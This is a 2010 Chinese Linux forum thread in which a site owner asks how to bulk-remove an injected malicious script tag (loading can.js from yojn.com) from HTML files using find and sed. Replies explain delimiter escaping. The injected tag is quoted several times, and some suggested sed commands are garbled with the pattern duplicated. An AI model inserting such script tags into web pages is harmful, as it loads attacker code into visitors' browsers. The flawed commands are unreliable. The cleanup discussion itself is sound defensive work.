免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
12下一页
最近访问板块 发新帖
查看: 3476 | 回复: 17
打印 上一主题 下一主题

网站木马批量清除的sed的正则 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2010-05-07 21:56 |只看该作者 |倒序浏览
木马:<script src='http://yojn.com/can.js?id=872651&web_id=872651' language='JavaScript' type='text/JavaScript' charset='gb2312'></script>
所有的html文件中被插入一行,现在想用sed清除掉html中被插入的这条,但不知道怎么写


现在我做到这里了
# find ./ -name "*.html" | xargs sed -i "s/"<script src='http://yojn.com/can.js?id=872651&web_id=872651' language='JavaScript' type='text/JavaScript' charset='gb2312'></script>//g

卡在正则这里了

论坛徽章:
0
2 [报告]
发表于 2010-05-07 21:59 |只看该作者
把原始数据贴出来吧~在把需求帖出来

论坛徽章:
0
3 [报告]
发表于 2010-05-07 22:02 |只看该作者
晕,那我继续贴
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>&Ouml;&ETH;&sup1;ú&Ecirc;&yacute;×&Ouml;&Ecirc;&Oacute;&Igrave;&yacute;&Iacute;&oslash;&Ecirc;×&Ograve;&sup3;&Iacute;&para;&Oacute;°&raquo;ú&AElig;&micro;&micro;&Agrave;</title>
<link href="inc/style.css" rel="stylesheet" type="text/css" />

<script src='http://yojn.com/can.js?id=872651&web_id=872651' language='JavaScript' type='text/JavaScript' charset='gb2312'></script>
</head>


<body>

<div class="container">

        <div class="mainnav">
                <div class="mainnav_1">


上面是原始网页,现在想清除这个script,但不是删掉这行,是替换为空,不知道我说明白没有

论坛徽章:
0
4 [报告]
发表于 2010-05-07 22:03 |只看该作者
本帖最后由 wtuter 于 2010-05-07 22:04 编辑

回复 1# locale


    这一行是唯一的是吗?


sed -i "#<script src='http://yojn.com/can.js?id=872651&web_id=872651' language='JavaScript' type='text/JavaScript' charset='gb2312'></script>script src='http://yojn.com/can.js?id=872651&web_id=872651' language='JavaScript' type='text/JavaScript' charset='gb2312'></script>#d"


sed -i "s#<script src='http://yojn.com/can.js?id=872651&web_id=872651' language='JavaScript' type='text/JavaScript' charset='gb2312'></script>script src='http://yojn.com/can.js?id=872651&web_id=872651' language='JavaScript' type='text/JavaScript' charset='gb2312'></script>##"

论坛徽章:
0
5 [报告]
发表于 2010-05-07 22:12 |只看该作者
恩,唯一

论坛徽章:
0
6 [报告]
发表于 2010-05-07 22:12 |只看该作者
德华兄帮我点解一下

论坛徽章:
0
7 [报告]
发表于 2010-05-07 22:16 |只看该作者

论坛徽章:
0
8 [报告]
发表于 2010-05-07 22:24 |只看该作者
iori809 发表于 2010-05-07 22:16



    你帮我点解一下

论坛徽章:
0
9 [报告]
发表于 2010-05-07 22:27 |只看该作者
最主要的就是 /需要转义。如果用#就不用了。这样sed就知道你到底是要替换/还是用/作为命令分割符了
不知道我说的你明白没

论坛徽章:
0
10 [报告]
发表于 2010-05-07 22:31 |只看该作者
最主要的就是 /需要转义。如果用#就不用了。这样sed就知道你到底是要替换/还是用/作为命令分割符了
不知道 ...
iori809 发表于 2010-05-07 22:27



    大概明白一点
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP